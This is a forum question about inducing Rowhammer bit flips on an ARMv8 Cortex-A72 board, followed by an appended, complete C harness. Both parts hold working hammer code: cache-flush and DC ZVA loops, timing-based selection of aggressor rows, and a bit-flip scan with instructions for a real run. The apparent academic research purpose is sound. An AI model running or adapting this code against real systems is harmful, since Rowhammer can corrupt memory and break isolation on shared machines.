Hi Everyone,
I have been trying to exploit the Rowhammer bug on ARMv8 running Linux for a university project.
The device is a quad-core Cortex-A72 (ARMv8) 64-bit SoC @ 1.5 GHz.
First I checked the UCI bit value in the SCTLR register, and it is set. So the unprivileged instructions to flush the cache are enabled.
The pseudocode is:
put addr1 into X9
put addr2 into X10
for i := 0 to N-1 do
    STR X0, [X9]
    STR X0, [X10]
    DC CIVAC, X9
    DC CIVAC, X10
I'm using two approaches to exploit the Rowhammer bug:
The first approach is based on using unprivileged instructions to flush the cache (DC CIVAC, DC CVAC).
Using timing measurements I can get two addresses addr1 and addr2 that are SBDR (Same Bank, Different Rows), and then I'm ready to run my Rowhammer loop:
for (int i = 0; i < HAMMER_ROUND; i++) {
    asm volatile(
        "str %2, [%0]\n\t"      /* write temp to addr1 */
        "str %2, [%1]\n\t"      /* write temp to addr2 */
        "dc cvac, %0\n\t"       /* clean addr1's line to the point of coherency */
        "dc cvac, %1\n\t"       /* clean addr2's line to the point of coherency */
        //"dsb 0xb"
        :
        : "r" (addr1), "r" (addr2), "r" (temp)
        : "memory");            /* tell the compiler memory is touched */
}
The second approach is based on bypassing the cache using the DC ZVA instruction.
In this case, I allocated a memory pool and set it to the value 0.
/* evict both lines once before hammering */
asm volatile(
    "dc civac, %0\n\t"
    "dc civac, %1\n\t"
    :
    : "r" (addr1), "r" (addr2)
    : "memory");
for (int j = 0; j < HAMMER_ROUND; ++j) {
    /* zero the whole cache line containing each address */
    __asm__ __volatile__("dc zva, %0\n\t" : : "r" (addr1) : "memory");
    __asm__ __volatile__("dc zva, %0\n\t" : : "r" (addr2) : "memory");
}
I have no bit flips.
My question is: am I using those instructions right?
Thank you.
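As an added example (not the poster's code and not an answer from the forum), below is a small self-contained C harness for the same procedure: flush-based pair latency measurement to pick candidate SBDR pairs, a store-and-clean hammer loop like the first approach, and a bit-flip scan of the buffer afterwards. On AArch64 it uses DC CIVAC followed by DSB SY (the architecture requires a DSB for the maintenance operation to be guaranteed complete) and CNTVCT_EL0 as the timer; on x86-64 it falls back to CLFLUSH and RDTSCP so the same file builds elsewhere. The page size, the 200-tick latency threshold, the HAMMER_ROUNDS count and the sample latency values are assumptions made for illustration; addr1/addr2 selection still needs real timing data on the target.

```c
/* Added rowhammer harness example; not from the original post. Assumptions:
 * 4 KiB rows of interest start on page boundaries, latency threshold 200 ticks. */
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <time.h>

#if defined(__aarch64__)
/* Clean+invalidate the line to the point of coherency, then wait for completion.
 * Needs SCTLR_EL1.UCI set, as the poster verified. */
static inline void flush_line(volatile void *p) {
    __asm__ volatile("dc civac, %0\n\tdsb sy" : : "r"(p) : "memory");
}
/* Generic timer counter; coarse (tens of MHz) but usable as a relative measure. */
static inline uint64_t timestamp(void) {
    uint64_t t;
    __asm__ volatile("isb\n\tmrs %0, cntvct_el0" : "=r"(t) : : "memory");
    return t;
}
#elif defined(__x86_64__)
#include <x86intrin.h>
static inline void flush_line(volatile void *p) {
    _mm_clflush((const void *)p);
    _mm_mfence();
}
static inline uint64_t timestamp(void) {
    unsigned aux;
    return __rdtscp(&aux);
}
#else
/* Portable fallback: no user-space flush available, timing is not meaningful. */
static inline void flush_line(volatile void *p) { (void)p; }
static inline uint64_t timestamp(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

#define ROW_STRIDE 4096          /* assumed: candidate rows on page boundaries */
#define HAMMER_ROUNDS 2000L      /* assumed: small value so the self-check is quick */

/* Minimum time to read a and b back to back after evicting both.
 * Pairs in the same bank but different rows show a higher minimum. */
uint64_t pair_latency(volatile uint8_t *a, volatile uint8_t *b, int rounds) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < rounds; i++) {
        flush_line(a);
        flush_line(b);
        uint64_t t0 = timestamp();
        (void)*a;
        (void)*b;
        uint64_t t1 = timestamp();
        if (t1 - t0 < best) best = t1 - t0;
    }
    return best;
}

/* Count latencies above threshold; if out is non-NULL store their indices. */
size_t find_conflict_pairs(const uint64_t *lat, size_t n, uint64_t threshold, size_t *out) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++)
        if (lat[i] > threshold) {
            if (out) out[found] = i;
            found++;
        }
    return found;
}

/* Store to both aggressors and push each line out of the cache every round. */
void hammer_pair(volatile uint8_t *a, volatile uint8_t *b, uint8_t val, long rounds) {
    for (long i = 0; i < rounds; i++) {
        *a = val;
        *b = val;
        flush_line(a);
        flush_line(b);
    }
}

/* Number of bits in buf that differ from the fill pattern. */
size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t expected) {
    size_t flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (size_t)__builtin_popcount(buf[i] ^ expected);
    return flips;
}

/* Constructed sample data for checks: 2 flipped bits, 2 latencies above 200. */
static const uint8_t sample_bytes[4] = {0xFF, 0xFE, 0xFF, 0x7F};
static const uint64_t sample_latency[5] = {120, 310, 118, 290, 125};

/* Hammer two pages of a fresh buffer and return the flip count (expected 0). */
int self_check(void) {
    size_t len = 2 * ROW_STRIDE;
    uint8_t *buf = aligned_alloc(ROW_STRIDE, len);
    if (!buf) return -1;
    memset(buf, 0xFF, len);
    hammer_pair(buf, buf + ROW_STRIDE, 0xFF, HAMMER_ROUNDS);
    size_t flips = count_bit_flips(buf, len, 0xFF);
    free(buf);
    return (int)flips;
}

int main(void) {
    printf("sample flips: %zu\n", count_bit_flips(sample_bytes, 4, 0xFF));
    printf("self-check flips: %d\n", self_check());
    return 0;
}
```

Build on the target with `gcc -O2 -o rh rh.c`. For a real run, scan a large physically backed buffer with pair_latency first and only hammer pairs that find_conflict_pairs selects; the threshold has to be calibrated from the measured latency distribution, and the victim check must cover the rows around the aggressors, not just the aggressors themselves.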